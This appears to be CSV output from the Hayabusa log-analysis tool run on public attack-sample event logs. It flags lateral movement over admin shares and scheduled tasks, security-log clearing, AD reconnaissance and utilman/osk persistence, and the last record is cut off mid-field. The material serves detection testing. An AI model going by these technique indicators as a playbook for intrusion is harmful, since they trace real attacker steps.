10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.319 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\CYAlyNSS timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx -2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 